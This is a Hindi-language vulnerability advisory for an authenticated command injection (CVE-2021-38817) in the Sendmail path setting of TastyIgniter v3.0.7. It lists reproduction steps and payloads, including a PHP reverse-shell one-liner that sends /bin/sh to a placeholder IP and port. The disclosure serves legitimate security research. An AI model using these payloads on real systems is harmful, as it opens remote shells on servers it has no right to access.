
TastyIgniter v3.0.7 Sendmail पथ फ़ील्ड में दूरस्थ OS कमांड इंजेक्शन
TastyIgniter v3.0.7 के Sendmail वेब भाग में प्रमाणित दूरस्थ OS कमांड इंजेक्शन/दूरस्थ कोड निष्पादन (CVE-2021-38817)
TastyIgniter v3.0.7 रेस्तरां CMS के वेब एप्लिकेशन के Sendmail कॉन्फ़िगरेशन मेन्यू में एक प्रमाणित दूरस्थ OS कमांड इंजेक्शन भेद्यता मौजूद है। Sendmail पथ पैरामीटर उचित रूप से स्वच्छ नहीं किया गया है, जैसा कि फ़ील्ड में संग्रहीत /usr/sbin/sendmail -bs कमांड द्वारा इंगित किया गया है, और अर्धविराम और एक अतिरिक्त OS कमांड जोड़कर मनमाने कमांड को इंजेक्ट करने की अनुमति देता है।
/admin/settings/edit/mail/admin पोर्टल में क्रेडेंशियल्स से प्रमाणित करें।/admin/settings/edit/mail पर जाएं।Mail Protocol ड्रॉप-डाउन मेन्यू में Sendmail चुनें।SendMail Path फ़ील्ड में एक अर्धविराम और एक मनमाना OS कमांड जोड़ें, उदाहरण: /usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'
Matt Kiely (HuskyHacks) तथा Mike Padrick (Fearless), अगस्त 2021
CVE असाइन किया गया अक्टूबर 2022 (हंसी)